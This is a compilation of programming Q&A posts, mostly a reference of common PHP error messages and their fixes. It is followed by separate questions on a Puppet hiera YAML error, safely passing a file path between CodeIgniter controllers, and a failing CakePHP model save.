$obj = new stdclass;
$obj->property = 2342;
foreach ($items as $item) {
    // do something with item
    $obj->counter++;
}
Related Questions:
All PHP "Notice: Undefined Variable" Questions on Stackoverflow
"Notice: Undefined variable", "Notice: Undefined index", and "Notice: Undefined offset" using PHP
Reference: What is variable scope, which variables are accessible from where and what are "undefined variable" errors?
Notice: Use of undefined constant XXX - assumed 'XXX'
or, in PHP 7.2 or later:
Warning: Use of undefined constant XXX - assumed 'XXX' (this will throw an Error in a future version of PHP)
or, in PHP 8.0 or later:
Error: Undefined constant XXX
This occurs when a token is used in the code and appears to be a constant, but a constant by that name is not defined.
One of the most common causes of this notice is a failure to quote a string used as an associative array key.
For example:
// Wrong
echo $array[key];
// Right
echo $array['key'];
Another common cause is a missing $ (dollar) sign in front of a variable name:
// Wrong
echo varName;
// Right
echo $varName;
Or perhaps you have misspelled some other constant or keyword:
// Wrong
$foo = fasle;
// Right
$foo = false;
It can also be a sign that a needed PHP extension or library is missing when you try to access a constant defined by that library.
Related Questions:
What does the PHP error message “Notice: Use of undefined constant” mean?
Fatal error: Cannot redeclare class [class name]
Fatal error: Cannot redeclare [function name]
This means you're either using the same function/class name twice and need to rename one of them, or it is because you have used require or include where you should be using require_once or include_once.
When a class or a function is declared in PHP, it is immutable, and cannot later be declared with a new value.
Consider the following code:
class.php
<?php
class MyClass
{
    public function doSomething()
    {
        // do stuff here
    }
}
index.php
<?php
function do_stuff()
{
    require 'class.php';
    $obj = new MyClass;
    $obj->doSomething();
}
do_stuff();
do_stuff();
The second call to do_stuff() will produce the error above. By changing require to require_once, we can be certain that the file that contains the definition of MyClass will only be loaded once, and the error will be avoided.
Parse error: syntax error, unexpected T_VARIABLE
Possible scenario
I can't seem to find where my code has gone wrong. Here is my full error:
Parse error: syntax error, unexpected T_VARIABLE on line x
What I am trying
$sql = 'SELECT * FROM dealer WHERE id="'$id.'"';
Answer
Parse error: A problem with the syntax of your program, such as leaving a semicolon off of the end of a statement or, like the case above, missing the . operator. The interpreter stops running your program when it encounters a parse error.
In simple words this is a syntax error, meaning that there is something in your code stopping it from being parsed correctly and therefore running.
What you should do is check carefully at the lines around where the error is for any simple mistakes.
That error message means that in line x of the file, the PHP interpreter was expecting to see an open parenthesis but instead, it encountered something called T_VARIABLE. That T_VARIABLE thing is called a token. It's the PHP interpreter's way of expressing different fundamental parts of programs. When the interpreter reads in a program, it translates what you've written into a list of tokens. Wherever you put a variable in your program, there is a T_VARIABLE token in the interpreter's list.
Good read: List of Parser Tokens
So make sure you enable at least E_PARSE in your php.ini. Parse errors should not exist in production scripts.
I always recommend adding the following statement while coding:
error_reporting(E_ALL);
PHP error reporting
It is also a good idea to use an IDE which will let you know about parse errors while typing. You can use:
NetBeans (a fine piece of beauty, free software) (the best in my opinion)
PhpStorm (uncle Gordon love this: P, paid plan, contains proprietary and free software)
Eclipse (beauty and the beast, free software)
Related Questions:
Reference: PHP Parse/Syntax Errors; and How to solve them?
Notice: Uninitialized string offset: *
As the name indicates, this type of error occurs when you are most likely trying to iterate over or find a value from an array with a non-existing key.
Consider that you are trying to show every letter from $string:
$string = 'ABCD';
for ($i=0, $len = strlen($string); $i <= $len; $i++){
    echo "$string[$i] \n";
}
The above example will generate (online demo):
A
B
C
D
Notice: Uninitialized string offset: 4 in XXX on line X
And, as soon as the script finishes echoing D, you'll get the error, because inside the for() loop you have told PHP to show you from the first to the fifth string character of 'ABCD', which exists, but since the loop starts to count from 0 and echoes D by the time it reaches 4, it will throw an offset error.
Similar Errors:
Illegal string offset 'option 1'
Notice: Trying to get property of non-object error
Happens when you try to access a property of an object while there is no object.
A typical example for a non-object notice would be
$users = json_decode('[{"name": "hakre"}]');
echo $users->name; # Notice: Trying to get property of non-object
In this case, $users is an array (so not an object) and it does not have any properties.
This is similar to accessing a non-existing index or key of an array (see Notice: Undefined Index).
This example is much simplified. Most often such a notice signals an unchecked return value, e.g. when a library returns NULL if an object does not exist or just an unexpected non-object value (e.g. in an Xpath result, JSON structures with unexpected format, XML with unexpected format etc.) but the code does not check for such a condition.
As those non-objects are often processed further on, often a fatal-error happens next on calling an object method on a non-object (see: Fatal error: Call to a member function ... on a non-object) halting the script.
It can be easily prevented by checking for error conditions and/or that a variable matches an expectation. Here such a notice with a DOMXPath example:
$result = $xpath->query("//*[@id='detail-sections']/div[1]");
$divText = $result->item(0)->nodeValue; # Notice: Trying to get property of non-object
The problem is accessing the nodeValue property (field) of the first item while it has not been checked if it exists or not in the $result collection. Instead it pays to make the code more explicit by assigning variables to the objects the code operates on:
$result = $xpath->query("//*[@id='detail-sections']/div[1]");
$div = $result->item(0);
$divText = "-/-";
if (is_object($div)) {
    $divText = $div->nodeValue;
}
echo $divText;
Related errors:
Notice: Undefined Index
Fatal error: Call to a member function ... on a non-object
Warning: open_basedir restriction in effect
This warning can appear with various functions that are related to file and directory access. It warns about a configuration issue.
When it appears, it means that access has been forbidden to some files.
The warning itself does not break anything, but most often a script does not properly work if file-access is prevented.
The fix is normally to change the PHP configuration, the related setting is called open_basedir.
Sometimes the wrong file or directory names are used, the fix is then to use the right ones.
Related Questions:
open_basedir restriction in effect. File(/) is not within the allowed path(s):
All PHP "Warning: open_basedir restriction in effect" Questions on Stackoverflow
Parse error: syntax error, unexpected '['
This error comes in two variations:
Variation 1
$arr = [1, 2, 3];
This array initializer syntax was only introduced in PHP 5.4; it will raise a parser error on versions before that. If possible, upgrade your installation or use the old syntax:
$arr = array(1, 2, 3);
See also this example from the manual.
Variation 2
$suffix = explode(',', 'foo,bar')[1];
Array dereferencing of function results was also introduced in PHP 5.4. If it's not possible to upgrade, you need to use a (temporary) variable:
$parts = explode(',', 'foo,bar');
$suffix = $parts[1];
See also this example from the manual.
Warning: [function] expects parameter 1 to be resource, boolean given
(A more general variation of Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given)
Resources are a type in PHP (like strings, integers or objects). A resource is an opaque blob with no inherently meaningful value of its own. A resource is specific to and defined by a certain set of PHP functions or extension. For instance, the Mysql extension defines two resource types:
There are two resource types used in the MySQL module. The first one is the link identifier for a database connection, the second a resource which holds the result of a query.
The cURL extension defines another two resource types:
... a cURL handle and a cURL multi handle.
When var_dumped, the values look like this:
$resource = curl_init();
var_dump($resource);
resource(1) of type (curl)
That's all most resources are, a numeric identifier ((1)) of a certain type ((curl)).
You carry these resources around and pass them to different functions for which such a resource means something. Typically these functions allocate certain data in the background and a resource is just a reference which they use to keep track of this data internally.
The "... expects parameter 1 to be resource, boolean given" error is typically the result of an unchecked operation that was supposed to create a resource, but returned false instead. For instance, the fopen function has this description:
Return Values
Returns a file pointer resource on success, or FALSE on error.
So in this code, $fp will either be a resource(x) of type (stream) or false:
$fp = fopen(...);
If you do not check whether the fopen operation succeeded or failed, and hence whether $fp is a valid resource or false, and pass $fp to another function which expects a resource, you may get the above error:
$fp = fopen(...);
$data = fread($fp, 1024);
Warning: fread() expects parameter 1 to be resource, boolean given
You always need to error check the return value of functions which are trying to allocate a resource and may fail:
$fp = fopen(...);
if (!$fp) {
    trigger_error('Failed to allocate resource');
    exit;
}
$data = fread($fp, 1024);
Related Errors:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given
Warning: Illegal string offset 'XXX'
This happens when you try to access an array element with the square bracket syntax, but you're doing this on a string, and not on an array, so the operation clearly doesn't make sense.
Example:
$var = "test";
echo $var["a_key"];
If you think the variable should be an array, see where it comes from and fix the problem there.
Code doesn't run/what looks like parts of my PHP code are output
If you see no result from your PHP code whatsoever and/or you are seeing parts of your literal PHP source code output in the webpage, you can be pretty sure that your PHP isn't actually getting executed. If you use View Source in your browser, you're probably seeing the whole PHP source code file as is. Since PHP code is embedded in <?php ?> tags, the browser will try to interpret those as HTML tags and the result may look somewhat confused.
To actually run your PHP scripts, you need:
a web server which executes your script
to set the file extension to .php, otherwise the web server won't interpret it as such*
to access your .php file via the web server
* Unless you reconfigure it, everything can be configured.
This last one is particularly important. Just double clicking the file will likely open it in your browser using an address such as:
file://C:/path/to/my/file.php
This is completely bypassing any web server you may have running and the file is not getting interpreted. You need to visit the URL of the file on your web server, likely something like:
http://localhost/my/file.php
You may also want to check whether you're using short open tags <? instead of <?php and your PHP configuration has turned short open tags off.
Also see PHP code is not being executed, instead code shows on the page
Warning: Array to string conversion
Notice: Array to string conversion
(A notice until PHP 7.4, since PHP 8.0 a warning)
This simply happens if you try to treat an array as a string:
$arr = array('foo', 'bar');
echo $arr; // Notice: Array to string conversion
$str = 'Something, ' . $arr; // Notice: Array to string conversion
An array cannot simply be echo'd or concatenated with a string, because the result is not well defined. PHP will use the string "Array" in place of the array, and trigger the notice to point out that that's probably not what was intended and that you should be checking your code here. You probably want something like this instead:
echo $arr[0]; // displays foo
$str = 'Something ' . join(', ', $arr); //displays Something, foo, bar
Or loop the array:
foreach($arr as $key => $value) {
    echo "array $key = $value";
    // displays first: array 0 = foo
    // displays next: array 1 = bar
}
If this notice appears somewhere you don't expect, it means a variable which you thought is a string is actually an array. That means you have a bug in your code which makes this variable an array instead of the string you expect.
Warning: mysql_connect(): Access denied for user 'name'@'host'
This warning shows up when you connect to a MySQL/MariaDB server with invalid or missing credentials (username/password). So this is typically not a code problem, but a server configuration issue.
See the manual page on mysql_connect("localhost", "user", "pw") for examples.
Check that you actually used a $username and $password.
It's uncommon that you gain access using no password - which is what happened when the Warning: said (using password: NO).
Only the local test server usually allows to connect with username root, no password, and the test database name.
You can test if they're really correct using the command line client:
mysql --user="username" --password="password" testdb
Username and password are case-sensitive and whitespace is not ignored. If your password contains meta characters like $, escape them, or put the password in single quotes.
Most shared hosting providers predeclare mysql accounts in relation to the unix user account (sometimes just prefixes or extra numeric suffixes). See the docs for a pattern or documentation, and CPanel or whatever interface for setting a password.
See the MySQL manual on Adding user accounts using the command line. When connected as admin user you can issue a query like:
CREATE USER 'username'@'localhost' IDENTIFIED BY 'newpassword';
Or use Adminer or WorkBench or any other graphical tool to create, check or correct account details.
If you can't fix your credentials, then asking the internet to "please help" will have no effect. Only you and your hosting provider have permissions and sufficient access to diagnose and fix things.
Verify that you could reach the database server, using the host name given by your provider:
ping dbserver.hoster.example.net
Check this from a SSH console directly on your webserver. Testing from your local development client to your shared hosting server is rarely meaningful.
Often you just want the server name to be "localhost", which normally utilizes a local named socket when available. Other times you can try "127.0.0.1" as fallback.
Should your MySQL/MariaDB server listen on a different port, then use "servername:3306".
If that fails, then there's perhaps a firewall issue. (Off-topic, not a programming question. No remote guess-helping possible.)
When using constants like e.g. DB_USER or DB_PASSWORD, check that they're actually defined.
If you get a "Warning: Access denied for 'DB_USER'@'host'" and a "Notice: use of undefined constant 'DB_PASS'", then that's your problem.
Verify that your e.g. xy/db-config.php was actually included and what else.
Check for correctly set GRANT permissions.
It's not sufficient to have a username+password pair.
Each MySQL/MariaDB account can have an attached set of permissions.
Those can restrict which databases you are allowed to connect to, from which client/server the connection may originate from, and which queries are permitted.
The "Access denied" warning thus may as well show up for mysql_query calls, if you don't have permissions to SELECT from a specific table, or INSERT/UPDATE, and more commonly DELETE anything.
You can adapt account permissions when connected per command line client using the admin account with a query like:
GRANT ALL ON yourdb.* TO 'username'@'localhost';
If the warning shows up first with Warning: mysql_query(): Access denied for user ''@'localhost' then you may have a php.ini-preconfigured account/password pair.
Check that mysql.default_user= and mysql.default_password= have meaningful values.
Oftentimes this is a provider-configuration. So contact their support for mismatches.
Find the documentation of your shared hosting provider:
e.g. HostGator, GoDaddy, 1and1, DigitalOcean, BlueHost, DreamHost, MediaTemple, ixWebhosting, lunarhosting, or just google yours.
Else consult your webhosting provider through their support channels.
Note that you may also have depleted the available connection pool. You'll get access denied warnings for too many concurrent connections. (You have to investigate the setup. That's an off-topic server configuration issue, not a programming question.)
Your libmysql client version may not be compatible with the database server. Normally MySQL and MariaDB servers can be reached with PHP's compiled-in driver. If you have a custom setup, or an outdated PHP version, and a much newer database server, or a significantly outdated one, then the version mismatch may prevent connections. (No, you have to investigate yourself. Nobody can guess your setup).
More references:
Serverfault: mysql access denied for 'root'@'name of the computer'
Warning: mysql_connect(): Access denied
Warning: mysql_select_db() Access denied for user ''@'localhost' (using password: NO)
Access denied for user 'root'@'localhost' with PHPMyAdmin
Btw, you probably don't want to use mysql_* functions anymore. Newcomers often migrate to mysqli, which however is just as tedious. Instead read up on PDO and prepared statements.
$db = new PDO("mysql:host=localhost;dbname=testdb", "username", "password");
Deprecated: Array and string offset access syntax with curly braces is deprecated
String offsets and array elements could be accessed by curly braces {} prior to PHP 7.4.0:
$string = 'abc';
echo $string{0}; // a
$array = [1, 2, 3];
echo $array{0}; // 1
This has been deprecated since PHP 7.4.0 and generates a warning:
Deprecated: Array and string offset access syntax with curly braces is deprecated
You must use square brackets [] to access string offsets and array elements:
$string = 'abc';
echo $string[0]; // a
$array = [1, 2, 3];
echo $array[0]; // 1
The RFC for this change links to a PHP script which attempts to fix this mechanically.
Warning: Division by zero
The warning message 'Division by zero' is one of the most commonly asked questions among new PHP developers. This error will not cause an exception, therefore, some developers will occasionally suppress the warning by adding the error suppression operator @ before the expression. For example:
$value = @(2 / 0);
But, like with any warning, the best approach would be to track down the cause of the warning and resolve it. The cause of the warning is going to come from any instance where you attempt to divide by 0, a variable equal to 0, or a variable which has not been assigned (because NULL == 0) because the result will be 'undefined'.
To correct this warning, you should rewrite your expression to check that the value is not 0, if it is, do something else. If the value is zero you either should not divide, or you should change the value to 1 and then divide so the division results in the equivalent of having divided only by the additional variable.
if ( $var1 == 0 ) { // check if var1 equals zero
    $var1 = 1; // var1 equaled zero so change var1 to equal one instead
    $var3 = ($var2 / $var1); // divide var2 by var1, i.e. var2/1
} else {
    $var3 = ($var2 / $var1); // if var1 does not equal zero, divide
}
Related Questions:
warning: division by zero
Warning: Division By Zero Working on PHP and MySQL
Division by zero error in WordPress Theme
How to suppress the “Division by zero” error
How to catch a division by zero?
Strict Standards: Non-static method [<class>::<method>] should not be called statically
Occurs when you try to call a non-static method on a class as if it were static, and you also have the E_STRICT flag in your error_reporting() settings.
Example :
class HTML {
    public function br() {
        echo '<br>';
    }
}
HTML::br() or $html::br()
You can actually avoid this error by not adding E_STRICT to error_reporting(), eg
error_reporting(E_ALL & ~E_STRICT);
since as of PHP 5.4.0 and above, E_STRICT is included in E_ALL [ref]. But that is not advisable. The solution is to define your intended static function as actual static :
public static function br() {
    echo '<br>';
}
or call the function conventionally :
$html = new HTML();
$html->br();
Related questions :
How can I solve "Non-static method xxx:xxx() should not be called statically" in PHP 5.4?

Evaluation Error while using the Hiera hash in puppet

I have the following values in my hiera yaml file:
test::config_php::php_modules :
-'soap'
-'mcrypt'
-'pdo'
-'mbstring'
-'php-process'
-'pecl-memcache'
-'devel'
-'php-gd'
-'pear'
-'mysql'
-'xml'
and following is my test class:
class test::config_php (
  $php_version,
  $php_modules = hiera_hash('php_modules', {}),
  $module_name,
){
  class { 'php':
    version => $php_version,
  }
  $php_modules.each |String $php_module| {
    php::module { $php_module: }
  }
}
While running my puppet manifests I get the following error:
Error: Evaluation Error: Error while evaluating a Function Call, create_resources(): second argument must be a hash at /tmp/vagrant-puppet/modules-f38a037289f9864906c44863800dbacf/ssh/manifests/init.pp:46:3 on node testdays-1a.vagrant.loc.vag
I am quite confused on what exactly am I doing wrong. My puppet version is 3.6.2 and I also have parser = future
I would really appreciate any help here.
Looks like your YAML was slightly off.
You don't really need quotes in YAML.
Your indentation was two instead of one.
Your first colon on the first time was spaced. This will throw a syntax error.
it should look more like this:
test::config_php::php_modules:
- soap
- mcrypt
- pdo
- mbstring
- php-process
- pecl-memcache
- devel
- php-gd
- pear
- mysql
- xml
In the future try and look up YAML parsers like this: link
The problem was with my puppet version; somehow version 3.6 acts weird while creating resources. For instance, it was failing on the following line:
create_resources('::ssh::client::config::user', $fin_users_client_options)
The code snippet above is part of the ssh module from puppet labs, which I assume is thoroughly tested and shouldn't be a reason for an exception.
A further analysis led to the fact that the exception was thrown when the parameter parser = future was set in the config file.
I cannot iterate using each without setting future as the parser, therefore I decided to change my source as follows:
I created a new class:
define test::install_modules {
  php::module { $name: }
}
and then I changed config_php to:
class test::config_php (
  $php_version,
  $php_modules = [],
){
  class { 'php':
    version => $php_version,
  }
  install_modules { $php_modules: }
}
Everything seems to be much better now.

file path is not retrieved in codeigniter

I am creating an invoice on the user's desired package selection. The pdf file is being created (but it takes some time), while the code checks for the file. The file exists. Here is the address of the file;
C:/wamp/www/proposal/file/invoice/Basic_52_60.pdf
This is the correct path to the file. I am passing this path to the function in another controller as;
redirect('email/email_invoice/'.$file);
When I tested the file path in email_invoice function, it displayed only c:
c:
The slashes in the path are not transferred. I don't know exactly what is the problem.
CodeIgniter considers each segment of the URL a parameter after the controller and method. So you are essentially passing 7 variables to the Email::email_invoice() method.
You could use some sort of encoding to pass it as one variable and then decode it on the other side such as:
$file = base64_encode($file);
redirect('email/email_invoice/' . $file);
Then in Email.php:
public function email_invoice($file) {
    $file = base64_decode($file);
}
Or you could pass it as a get parameter:
redirect('email/email_invoice/?file=' . $file);
public function email_invoice() {
    $file = $this->input->get('file');
}
The latter requires the $_GET array to be enabled which it is not by default.
UPDATE - Using Flashdata
Based on some of the comments I thought I would update this answer. base64_encode() can result in characters that will break the URL so you would need to use:
$file = urlencode(base64_encode($file));
redirect('email/email_invoice/' . $file);
And on the other side:
public function email_invoice($file) {
    // Undo the encoding in reverse order: URL-decode first, then base64-decode
    $file = base64_decode(urldecode($file));
}
As the OP pointed out $_GET variables can be manipulated leaving you open to directory traversal attacks or other vulnerabilities. Even if done right you would need extra code for security. Encoding can easily be spotted and altered.
File paths probably shouldn't be carried around in the URL. POST data can be manipulated also even if it is less obvious. Security through obscurity is not security at all. A better approach would be to use flashdata.
$this->session->set_flashdata('email_invoice_pdf', $file);
redirect('email/email_invoice/');
Then in your controller:
public function email_invoice() {
    $file = $this->session->flashdata('email_invoice_pdf');
}
That's it. The session was used to carry the file path to the next page request, but after that it is gone.
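The "extra code for security" mentioned in the answer above, sketched as an added example that is not part of the original answer or of CodeIgniter: the client supplies only an invoice file name, and a helper confines it to the invoice directory before the file is opened. The function name resolve_invoice_path(), the accepted file-name pattern and the temporary demo directory are assumptions made for this illustration.

```php
<?php
declare(strict_types=1);

/**
 * Resolve a client-supplied invoice name to a file directly inside $baseDir.
 * Returns the canonical path, or null when the name is not acceptable.
 * (Hypothetical helper, written for this example.)
 */
function resolve_invoice_path(string $baseDir, string $requested): ?string
{
    // Canonicalise the base directory; realpath() returns false if it is missing.
    $base = realpath($baseDir);
    if ($base === false || !is_dir($base)) {
        return null;
    }

    // Accept only a bare file name of the expected shape:
    // no directory separators, no "..", no drive letters, fixed extension.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\.pdf\z/', $requested) !== 1) {
        return null;
    }

    // realpath() resolves symlinks and returns false for non-existent files.
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($path === false || !is_file($path)) {
        return null;
    }

    // The canonical path must still sit directly under the base directory
    // (this catches a symlink inside the directory that points elsewhere).
    if (dirname($path) !== $base) {
        return null;
    }

    return $path;
}

// --- Constructed demo data: a temporary invoice directory with one file ---
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'invoice_demo_' . bin2hex(random_bytes(4));
mkdir($dir);
$sample = $dir . DIRECTORY_SEPARATOR . 'Basic_52_60.pdf';
file_put_contents($sample, '%PDF-1.4 constructed sample');

$inputs = [
    'Basic_52_60.pdf',                                   // bare name from the question
    '../Basic_52_60.pdf',                                // parent-directory reference
    'C:/wamp/www/proposal/file/invoice/Basic_52_60.pdf', // full path supplied by the client
    'missing.pdf',                                       // well-formed name, no such file
];

foreach ($inputs as $input) {
    $resolved = resolve_invoice_path($dir, $input);
    printf("%-52s => %s\n", $input, $resolved === null ? 'rejected' : 'accepted');
}

// Remove the constructed demo data again.
unlink($sample);
rmdir($dir);
```

Only the first input is accepted; the same check applies whether the name arrives in a URL segment, a GET parameter, POST data or flashdata.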

CakePHP: save() fails but there are no validationErrors

I am trying to save an item through my model, but saving fails.
When I output validationErrors - I get empty array, so no validation problems seem to be available. What could be failing my save()?
function resave($wid, $kTime){
    $this->contain();
    $word = $this->getById($wid);
    // Successfully retrieved here
    $word['ModelName']['column'] = $kTime;
    if($this->save($word)){
        return 'success';
    }else{
        // this returns empty array
        return $this->validationErrors;
    }
}
To save yourself some time in the future, if a save() isn't working, the first place to look is in your SQL log and errors.
You should try installing Debug Kit Toolbar for CakePHP (https://github.com/cakephp/debug_kit). It makes it easy to view your SQL log, along with a bunch of other useful stuff. Or, alternatively, you can just put this in your layout file to view SQL history/errors:
<?php echo $this->element('sql_dump'); ?>
It was a problem with float and array type. I investigated it with gettype() and figured it out.

Resources